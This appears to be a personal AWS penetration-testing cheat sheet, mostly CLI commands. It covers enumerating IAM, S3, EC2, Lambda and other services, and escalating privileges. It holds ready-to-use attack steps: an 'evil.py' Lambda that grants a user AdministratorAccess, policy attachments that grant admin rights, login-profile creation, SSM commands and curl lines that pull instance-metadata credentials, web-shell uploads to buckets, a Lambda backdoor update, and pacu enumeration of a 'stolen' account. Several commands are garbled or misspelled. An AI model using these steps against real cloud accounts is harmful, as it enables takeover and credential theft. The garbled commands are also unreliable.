AWS
00. Basic
Configure AWS creds
## ------------------| Configure
aws configure
# AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
# AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
# Default region name [None]: us-west-2
# Default output format [None]:
## ------------------| Export as env
export AWS_PROFILE=ProfileName
export AWS_REGION=<AWS_REGION>
export AWS_ACCESS_KEY_ID=<ACCESS_KEY>
export AWS_SECRET_ACCESS_KEY=<SECRET_KEY>
export AWS_SESSION_TOKEN=<SESSION_TOKEN>
## ------------------| Use as file
aws configure import --csv file://credentials.csv
## ------------------| Set as .aws
### ~/.aws/credentials
[<ProfileName>]
aws_access_key_id = <ACCESS_KEY>
aws_secret_access_key = <SECRET_KEY>
aws_session_token = <SESSION_TOKEN>
### ~/.aws/config
[profile <ProfileName>]
region = <AWS_REGION>
## ------------------| List details
aws sts get-caller-identityCredentials
## ------------------| If the AccessKeyId is starting from
AKI <-- Long term credentials
ASI <-- short term credentials## ------------------| Format
arn:partition:service:region:account-id:resource-id
arn:partition:service:region:account-id:resource-type/resource-id
arn:partition:service:region:account-id:resource-type:resource-id
^ 12 digit number
## ------------------| [partition]
aws AWS Regions
aws-cn China Regions
aws-us-gov AWS GovCloud (US) Regions
## ------------------| [service]
s2,lambda,ec2,iam
## ------------------| [region]
us-east-1,..
## if it is none it's mean it's globle
arn:partition:service::account-id:resource-id## ------------------| List down all RDS databases
aws rds describe-db-instances --output=table --color on --filter --query DBInstances[].[DBinstanceIdentifier,MasterUsername,DBSubnetGroup.VpcID,Endpoint.Address]
## ------------------| List down all subnets
aws rds describe-db-instances --output=table --color on --filter --query DBInstances[].DBSubnetGroup.Subnets[].SubnetIdentifier
## ------------------| Examine selected database subnets
aws rds describe-db-instances --output=table --color on --filter "Name=db-instance-id,Values=<DBName>" --query DBInstances[].DBSubnetGroup.Subnets[].SubnetIdentifier
## ------------------| List down all NACLs
aws ec2 describe-network-acls --output=table --color on --filter --query NetworkAcls[].Entries
## |0.0.0.0/0| True | -1 | allow | 100 | << Open for all
## ------------------| For selected subnets; What traffic do network access control lists (NACLs) allow?
aws ec2 describe-network-acls --output=table --color on --filter "Name=association.subnet-id,Values=subnet-0a7f04b97a6ed9b11" --query NetworkAcls[].Entries
## ------------------| What traffic do DB security groups allow?
aws ec2 describe-security-groups --output=table --color onaw
aws ec2 describe-security-groups --output=table --color on --filter "Name=groupid,Values=sg-0a7f04b97a6ed9b11" | less
## ------------------| Find VPC with access to database
aws ec2 describe-vpcs --output=table --color on
aws ec2 describe-vpcs --output=table --color on --filter "Name=cidrBlock,Values=172.31.0.0/16"
aws ec2 describe-vpcs --output=table --color on --filter "Name=cidrBlock,Values=172.31.0.0/16" --query Vpcs[].VpcId
## ------------------| VPC security group [port 3306 egress]
aws ec2 describe-security-groups --output=table --color on --filter "Name=ip-permission.to-port,Values=3306"
aws ec2 describe-security-groups --output=table --color on --filter "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" --filter "Name=ip-permission.to-port,Values=22" --query 'SecurityGroups[].GroupId'
## ------------------| Check Lambda functions
aws lambda list-functions --output=table --color on
aws lambda list-functions --output=table --color on --query Functions[?VpcConfig.SecurityGroupIds==[`sg-07d51f986796059f9`]].FunctionName
## ------------------| Query to download Lambda source code
aws lambda get-function --function-name <FunctionName> --query Code.Location
## ------------------| List all ec2s which has public IP (Look for instance that can exfi) l
aws ec2 describe-instances --output text --query Reservations[].Instances[].NetworkInterfaces[].Association.[PublicIp,PublicDnsName]
## ------------------| Find No outbound restrictions security groups
aws ec2 describe-security-groups --color on --output table --filter "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" --query SecurityGroups[].GroupId
aws ec2 describe-security-groups --color on --output table --filter "Name=egress.ip-permission.cidr,Values='0.0.0.0/0'" --filter "Name=vpc-id,Values=<VPCId>" --query SecurityGroups[].GroupId01. IAM (Identity and Access Management)
01.0 Users
## ------------------| List all users
aws iam list-users
aws iam list-users --output table --query Users[].[UserName,Arn,UserId]
## ------------------| Enumarate groups for users
aws iam list-groups-for-user --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do aws iam list-groups-for-user --user-name $i;done
## ------------------| List all inline policies
aws iam list-user-policies --user-name <GroupName>
## ------------------| Lists all managed policies
aws iam list-attached-user-policies --user-name <GroupName>
## ------------------| Enumarate user's signing certificates
aws iam list-signing-certificates --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do echo "[$i]";aws iam list-signing-certificates --user-name $i --output json;done
## ------------------| Check for public ssh keys for user.
aws iam get-ssh-public-key --user-name <UserName> --encoding <PEM/SSH> --ssh-public-key-id <SSHPublicKeyId>
## ------------------| Check for Multi Factor Auth for user
aws iam list-virtual-mfa-devices
aws iam list-mfa-devices --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do echo "[$i]";aws iam list-mfa-devices --user-name $i --output json;done
## ------------------| Check if the user have console login profile
aws iam get-login-profile --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do echo "[$i]";aws iam get-login-profile --user-name $i;done
## ------------------| Create another access key
aws iam create-access-key --user-name <UserName>01.2 Groups
## ------------------| List all groups
aws iam list-groups --output json
## ------------------| List all inline policies
aws iam list-group-policies --group-name <GroupName>
## ------------------| Lists all managed policies
aws iam list-attached-group-policies --group-name <GroupName>
01.3 Roles
## ------------------| List all roles
aws iam list-roles --output json
## ------------------| List role information
aws iam get-role --role-name <RoleName> --output json
## ------------------| Lists all attached policies
## arn:aws:sts::<account-id>:.../<RoleName>/...
aws iam list-attached-role-policies --role-name <RoleName>
## ------------------| List all inline policies.
aws iam list-role-policies --role-name <RoleName>
## ------------------| Assuming the role
aws sts assume-role --role-arn arn:aws:iam::<AccountID>role/<RoleName> --role-session-name AnyName01.4 Policies
## ------------------| List all policies
aws iam list-policies --output json
aws iam list-policies --output json --scope Local
aws iam list-policies --output json | grep Admin
aws iam list-policies --output json --query Policies[].[PolicyName,PolicyId,Arn,DefaultVersionId]
## ------------------| List all inline policies
aws iam list-user-policies --user-name <UserName>
for i in $(aws iam list-users --query Users[].UserName --output text);do aws iam list-user-policies --user-name $i;done
## ------------------| List all manage policies
aws iam list-attached-user-policies --user-name <Username>
for i in $(aws iam list-users --query Users[].UserName --output text);do echo -n "[$i]\t";aws iam list-attached-user-policies --user-name user22 --output text | awk '{print $2"\t"$3}';done
## ------------------| Check policy permissions / Find the DefaultVersionId
aws iam get-policy --policy-arn <arn:aws:iam::<AccountID>:policy/<PolicyName>
## ------------------| Read the policy document
aws iam get-policy-version --output json --policy-arn <arn:aws:iam::<AccountID>:policy/<PolicyName> --version-id <DefaultVersionId>
## ------------------| List details about inline policy document
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>
aws iam get-group-policy --group-name <GroupName> --policy-name <PolicyName>
aws iam get-role-policy --role-name <RoleName> --policy-name <PolicyName>
## ------------------| [If user has PutUserPolicy] Add an inline policy document that is embedded in the specified IAM user
aws iam put-user-policy --user-name <UserName> --policy-name <PolicyName> --policy-document file://Policy.json
## ------------------| Policy.json
{
"Version": "2022-07-14",
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": [
"*"
]
}
]
}01.5 Privilege Escalation
| Required Permission | PrivilageEsc Methods |
|---|---|
iam:AttachUserPolicy | Attaching a policy to a user |
iam:AttachGroupPolicy | Attaching a policy to a group |
iam:AttachRolePolicy | Attaching a policy to a role |
iam:CreateAccessKey | Creating a new user access key |
iam:CreateLoginProfile | Creating a new login profile |
iam:UpdateLoginProfile | Updating an existing login profile |
iam:PassRole ec2:RunInstances | Creating an EC2 instance with an existing instance profile |
iam:PutUserPolicy | Creating/updating an inline policy for a user |
iam:PutGroupPolicy | Creating/updating an inline policy for a group |
iam:PutRolePolicy | Creating/updating an inline policy for a role |
iam:AddUserToGroup | Adding a user to a group |
iam:UpdateAssumeRolePolicy sts:AssumeRole | Updating the AssumeRolePolicyDocument of a role |
iam:PassRole lambda:CreateFunction lambda:InvokeFunction | Passing a role to a new Lambda function, then invoking it |
lambda:UpdateFunctionCode | Updating the code of an existing Lambda function |
01.5.1 Overly Permissive Permission
iam:AttachUserPolicy
## ------------------| Check if you have "Action": "iam:AttachUserPolicy"
aws iam get-policy-version --policy-arn <arn:aws:iam::<AccountID>:policy/<PolicyName> --version-id <DefaultVersionId>
## ------------------| Find ARN for AdministratorAccess policy
aws iam list-policies | grep "AdministratorAccess"
## ------------------| Attach policy for a user
aws iam attach-user-policy --user-name <UserName> --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
## ------------------| Checking attached policies again
aws iam list-attached-user-policies --user-name <UserName>iam:CreateLoginProfile
## ------------------| Check if you have "Action": "iam:CreateLoginProfile"
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>
## ------------------| List all users
aws iam list-users --output table --query Users[].[UserName,Arn,UserId]
## ------------------| View existing policies
aws iam list-attached-user-policies --user-name <UserName>
## ------------------| Creating login profile
aws iam create-login-profile --user-name <UserName> --password Passw0rd@123 --no-password-reset-required sts:AssumeRole
## ------------------| Check if you have sts:AssumeRole
aws sts assume-role --role-arn <RoleArn> --role-session-name <SessionName> --profile <ProfileName>
### extrack the token to .aws
## ------------------| List all ebs snapshots
aws ec2 describe-snapshots --owner-ids <Victim_Account> --region <Region> --profile <ProfileName>
## ------------------| Exploit
aws ec2 modify-snapshot-attribute --snapshot-id <SnapId> --attribute CreateVoulmePermission --operation-type add --user-ids <Victim_Account> --region <Region> --profile <ProfileName>
aws ec2 create-volume --snapshot-id <SnapId> --availability-zone <Region> --region <Region> --profile <ProfileName>
aws ec2 attach-voumne --device /dev/xvhd --instance-id <InstanceID> --volume-id <VolumeId> --region <Region> --profile <ProfileName>iam:PassRole with lambda:CreateFunction
## ------------------| Check if we have rights to go ahead
aws iam list-user-policies --user-name <CurrentUserName>
aws iam get-user-policy --user-name <CurrentUserName> --policy-name <PolicyName>
## ------------------| Finding lambda role details
aws iam list-roles --output json
aws iam list-roles --output json --query "Roles[].[RoleName,AssumeRolePolicyDocument.Statement[].Principal.Service]" | grep -B2 "lambda.amazonaws.com"
## ------------------| Check policy details for lamda role for iam:AttachUserPolicy
aws iam get-role --role-name <RoleName> --output json
aws iam list-role-policies --role-name <RoleName> --output json
aws iam get-role-policy --role-name <RoleName> --policy-name <PolicyName> --output json
## ------------------| Creating lambda function (evil.py)
import boto3
def h4rithd(event, context):
iam = boto3.client("iam")
response = iam.attach_user_policy(
UserName="<UserName>",PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
## ------------------| Upload lambda function
zip evil-function.zip evil.py
aws lambda create-function --function-name evil-function --runtime python3.8 --zip-file fileb://evil-function.zip --handler evil.h4rithd --role <arn:aws:iam::account-id:/role/lamdaFunction
## ------------------| Execute/Invoking the lambda function
aws lambda invoke --function-name evil-function results.txtiam:PassRole with ec2:RunInstances
## ------------------| List policies and check if we have access
aws iam list-attached-user-policies --user-name <UserName>
aws iam list-user-policies --user-name <UserName>
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>
## ------------------| List ec2 roles and get role name
aws iam list-roles --output json --query "Roles[].[RoleName,AssumeRolePolicyDocument.Statement[].Principal.Service]" | grep -B2 "ec2.amazonaws.com"
## ------------------| Listing policy details attached to role
aws iam list-role-policies --role-name <RoleName>
aws iam get-role-policy --role-name <RoleName> --policy-name <PolicyName>
## ------------------| Find AMI id
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*' 'Name=state,Values=available' --output json | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId'
## ------------------| Find subnet id
aws ec2 describe-subnets
## ------------------| List security groups
aws ec2 describe-security-groups
## ------------------| List instance profile name
aws iam list-instance-profiles
## ------------------| Stat ec2 instance
aws ec2 run-instance --subnet-id <SubnetID> --image-id <AIMID> --iam-instance-profile Name=<ProfileName> --instance-type t2.micro --security-group-ids "<SecurityGroupId>"
## ------------------| If you have SSM *
aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials"]' --targets "Key=instanceids,Values=<InstaneID>" --comment "This is comment"
## Copy the CommandID
## ------------------| Check the command's output
aws ssm get-command-invocation --command-id "<CommandID>" --instance-id "<InstanceID>"01.5.2 Dangerous policy combinations
## ------------------| List policies
aws iam list-attached-user-policies --user-name <UserName>
aws iam list-user-policies --user-name <UserName>
aws iam get-user-policy --user-name <UserName> --policy-name <PolicyName>02. S3 (Simple Storage Service)
## ------------------| List all s3 bucktes
aws s3api list-buckets
aws s3 ls s3://
## ------------------| Interact with s3 bucktes
aws s3 ls s3://<bucktes-name>
## ------------------| Get the information about specified bucket acls
aws s3api get-bucket-acl --bucket <BucketName>
## ------------------| Get the information about specified bucket policy
aws s3api get-bucket-policy --bucket <BucketName>
## ------------------| Retrieves the Public Access Block configuration for an Amazon S3 bucket
aws s3api get-public-access-block --bucket <BucketName>
## ------------------| List of all the objects in specified bucket
aws s3api list-objects --bucket <BucketName>
## ------------------| Get the acls information about specified object
aws s3api get-object-acl --bucket <BucketName> --key <ObjectName>
## ------------------| Copy file to bucket
aws s3 cp /tmp/shell.php s3://<bucktes-name>/shell.php
## ------------------| List all directory
aws --endpoint-url http://s3.bucket.htb s3 ls
## ------------------| List what inside the directory
aws --endpoint-url http://s3.bucket.htb s3 ls
aws --endpoint-url http://s3.bucket.htb s3 ls <directory>
## ------------------| Upload file/shell
aws --endpoint-url http://s3.bucket.htb s3 cp shell.php s3://<directory>/shell.php
## ------------------| Create a bucket and enable versioning
aws s3 mb s3://aws-<BucketName> --region <Region> --profile <Profile>
aws s3api put-bucket-versioning --bucket <BucketName> --versioning-configuration Status=Enabled --region <Region> --profile <Profile> 03. VPC (Virtual Private Cloud)
## ------------------| Get details
aws ec2 describe-vpcs
aws ec2 describe-vpcs --region <us-east-1/us-west-1>
aws ec2 describe-vpcs --filters "Name=vpc-id,Values=<VpcID>"
## ------------------| List Subnets
aws ec2 describe-subnets
aws ec2 describe-subnets --filters "Name=vpc-id, Values=<VpcID>"
## ------------------| List Route Table
aws ec2 describe-route-tables
aws ec2 describe-route-tables --filters "Name=vpc-id, Values=<VpcID>"
## ------------------| List Network ACLs
aws ec2 describe-network-acls
aws ec2 describe-network-acls --filters "Name=vpc-id, Values=<VpcID>"
## ------------------| List all VPC Peering Connections
aws ec2 describe-vpc-peering-connections
## ------------------| List about EC2 Instances In the specified VPC
aws ec2 describe-instances --filters “Name=vpc-id, Values=<VpcID>”
## ------------------| List about EC2 Instances In the specified Subnet
aws ec2 describe-instances --filters “Name=subnet-id, Values=<SubnetID>"04. EC2 (Elastic Compute Cloud)
## ------------------| List all Instances
aws ec2 describe-instances
aws ec2 describe-instances --region <us-east-1/us-west-1>
## ------------------| List the Information about Specified Instance
aws ec2 describe-instances --instance-ids <InstanceId>
## ------------------| List the Information about UserData Attribute of the specified Instance
aws ec2 describe-instance-attribute –attribute userData --instance-id <InstanceId>
## ------------------| List the Information about IAM instance profile associations
aws ec2 describe-iam-instance-profile-associations
## ------------------| Attach an instance profile with a role to a EC2 instance
aws ec2 associate-iam-instance-profile --instance-id <InstanceID> --iam-instance-profile Name=<ProfileName>
## ------------------| AWS Metadata
### IMDV1
curl http://169.254.169.254/latest/meta-data/
curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials
curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials/Role
curl -sS http://169.254.169.254/latest/meta-data/iam/security-credentials/RoleName\
curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
### IMDV2
export TOKEN=$(curl -sS -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -sS -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
## ------------------| AWS Userdata
### IMDV1
curl http://169.254.169.254/latest/user-data/
### IMDV2
export TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -sS -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/user-data/05. EBS (Elastic Block Store)
## ------------------| List the Information about EBS volumes
aws ec2 describe-volumes
## ------------------| List about all the available EBS snapshots
aws ec2 describe-snapshots
aws ec2 describe-snapshots --owner-ids self
## ------------------| Creates a snapshot of the specified volume
aws ec2 create-snapshot --volume-id <VolumeID> --description "Backup Snapshot"
## ------------------| Create a volume from snapshots
aws ec2 create-volume --snapshot-id <SnapshotID> --availability-zone <AvailabilityZone>
## ------------------| Attach specified volume to the ec2-instance
aws ec2 attach-volume --volume-id <VolumeID> --instance-id <InstanceID> --device </dev/sdfd>
## ------------------| Mount Volume on EC2 file system
sudo mount </dev/sdfd> /mnt/backups06. EKS (Elastic Kubernetes Service)
## ------------------| Describe about all the repositories in the container registry
aws ecr describe-repositories
## ------------------| Get the information about repository policy
aws ecr get-repository-policy --repository-name <RepositoryName>
## ------------------| Lists of all images in the specified repository
aws ecr list-images --repository-name <RepositoryName>
## ------------------| Describe the information about a container image
aws ecr describe-images --repository-name <RepositoryName>--image-ids imageTag=ImageTag
## ------------------| Lists all ECS Clusters
aws ecs list-clusters
## ------------------| Describe information about specified cluster
aws ecs describe-clusters --cluster <ClusterName>
## ------------------| Lists all services in the specified cluster
aws ecs list-services --cluster <ClusterName>
## ------------------| Describe the information about a specified service
aws ecs describe-services --cluster <ClusterName> --services <ServiceName>
## ------------------| Lists all tasks in the specified cluster
aws ecs list-tasks --cluster <ClusterName>
## ------------------| Describe the information about a specified task
aws ecs describe-tasks --cluster <ClusterName> --tasks <TaskArn>
## ------------------| Lists all containers in the specified cluster
aws ecs list-container-instances --cluster <ClusterName>
## ------------------| Lists all EKS Clusters
aws eks list-clusters
## ------------------| Describe the information about a specified cluster
aws eks describe-cluster --name <ClusterName>
## ------------------| List of all node groups in a specified cluster
aws eks list-nodegroups --cluster-name <ClusterName>
## ------------------| Describe the information about a specific node group in a cluster
aws eks describe-nodegroup --cluster-name <ClusterName> --nodegroup-name <NodeGroup>
## ------------------| List of all fargate in a specified cluster
aws eks list-fargate-profiles --cluster-name <ClusterName>
## ------------------| Describe the information about a specific fargate profile in a cluster
aws eks describe-fargate-profile --cluster-name <ClusterName> --fargate-profile-name <ProfileName>07. RDS (Relational Database Service)
## ------------------| Describes the Information about the clusters in RDS
aws rds describe-db-clusters
## ------------------| Describes the Information about the database instances in RDS
aws rds describe-db-instances
## ------------------| Describes the Information about the subnet groups in RDS
aws rds describe-db-subnet-groups
## ------------------| Describes the Information about the database security groups in RDS
aws rds describe-db-security-groups
## ------------------| Describes the Information about the database proxies in RDS
aws rds describe-db-proxies08. KMS (Key Management Server)
## ------------------| Lists of the all keys available in key management server (KMS)
aws kms list-keys
## ------------------| Describes about specified key
aws kms describe-key --key-id <KeyID>
## ------------------| Lists of policies attached to specified key
aws kms list-key-policies --key-id <KeyID>
## ------------------| Get full information about a policy
aws kms get-key-policy --policy-name <PolicyName> --key-id <KeyID>09. Lambda
Functions
## ------------------| List all functions
aws lambda list-functions --endpoint-url=http://cloud.epsilon.htb
## ------------------| Get code
aws lambda get-function --function-name=<Function_Name> --endpoint-url=http://cloud.epsilon.htb
## ------------------| Upload the backdoor updated code to aws lambda function
aws lambda update-function-code --function-name <MyFunction> --zip-file file://backdoor.zip
## ------------------| Get details for lambda function
aws lambda get-function --function-name <FunctionName>
## ------------------| Get details for the policy Information about the specified lambda function
aws lambda get-policy --function-name <FunctionName>
## ------------------| Get details for the event source mapping Information about the specified lambda function
aws lambda list-event-source-mappings --function-name <FunctionName>
## ------------------| List of all the layers (dependencies) in aws account
aws lambda list-layers
## ------------------| Get details for the full Information about the specified layer name
aws lambda get-layer-version --layer-name <LayerName> --version-number <VersionNumber>
## ------------------| Create a lambda function and attach role to this function
aws lambda create-function --function-name <MyFunction> --runtime <python3.7> --zip-file fileb://file.zip --handler <myfunction.handler> --role <RoleArn> --region <Region>
## ------------------| Invoke the lambda function
aws lambda invoke --function-name <FunctionName> response.json --region <Region>API Gateway
## ------------------| List of all the Rest APIs
aws apigateway get-rest-apis
## ------------------| Get the information about specified API
aws apigateway get-rest-api --rest-api-id <ApiId>
## ------------------| Lists information about a collection of resources
aws apigateway get-resources --rest-api-id <ApiId>
## ------------------| Get information about the specified resource
aws apigateway get-resource --rest-api-id <ApiId> --resource-id <ResourceID>
## ------------------| Get the method information for the specified resource
aws apigateway get-method --rest-api-id <ApiId> --resource-id <ResourceID> --http-method <Method>
## ------------------| List of all stages for a REST API
aws apigateway get-stages --rest-api-id <ApiId>
## ------------------| Get the information about specified API's stage
aws apigateway get-stage --rest-api-id <ApiId> --stage-name <StageName>
## ------------------| List of all the API keys
aws apigateway get-api-keys --include-values
## ------------------| Get the information about a specified API key
aws apigateway get-api-key --api-key <ApiKey>10. DynamoDB
## ------------------| List Tables
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
## ------------------| Get stuff on the table
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name <tableName> | jq .
## ------------------| Put stuff on the table
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name <tableName> --item file://<filename>.json
## ------------------| Create table
aws --endpoint-url http://s3.bucket.htb dynamodb create-table \ 255 ⨯
--table-name alerts \
--attribute-definitions AttributeName=title,AttributeType=S \
--key-schema AttributeName=title,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=511. Secret Manager
## ------------------| Lists of the all secrets that are stored by Secrets Manager
aws secretsmanager list-secrets
## ------------------| Describes about specified secret
aws secretsmanager describe-secret --secret-id <SecretName>
## ------------------| Get the resource-based policy that is attached to the specified Secret
aws secretsmanager get-resource-policy --secret-id <SecretID>
12. pacu
Cross Account Enumerations
## ------------------| User Enumerations
### Create assume-role.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "sts:AssumeRole",
"Condition": {}
}
]
}
### Create the role
aws iam create-role -role-name AnyName --assume-role-policy-document file:///$(pwd)/assume-role.json
### Start pacu and set the keys
run iam__enum_users --role-name AnyName --account-id <StolenAccountID>
run iam__enum_users --role-name AnyName --account-id <StolenAccountID> --word-list username.txt
## ------------------| Role Enumerations
run iam__enum_roles --role-name AnyName --account-id <StolenAccountID>
run iam__enum_roles --role-name AnyName --account-id <StolenAccountID> --word-list username.txt13. ScoutSuite
## ------------------| Install
git clone https://github.com/nccgroup/ScoutSuite && cd ScoutSuite
virtualenv -p python3 venv && source venv/bin/activate
pip install -r requirements.txt
python scout.py --help
## ------------------| Enumerate
python scout.py aws -p <Profile> -r <Region>14. PMapper
## ------------------| Install
pip install principalmapper
## ------------------| Create a graph for the account, accessed through AWS CLI profile "skywalker"
pmapper --profile skywalker graph create
## ------------------| Run a query to see who can make IAM Users
pmapper --profile skywalker query 'who can do iam:CreateUser'
## ------------------| Run a query to see who can launch a big expensive EC2 instance, aside from "admin" users
pmapper --account 000000000000 argquery -s --action 'ec2:RunInstances' --condition 'ec2:InstanceType=c6gd.16xlarge'
## ------------------| Run the privilege escalation preset query, skip reporting current "admin" users
pmapper --account 000000000000 query -s 'preset privesc *'
## ------------------| Create an SVG representation of the admins/privescs/inter-principal access
pmapper --account 000000000000 visualize --filetype Last updated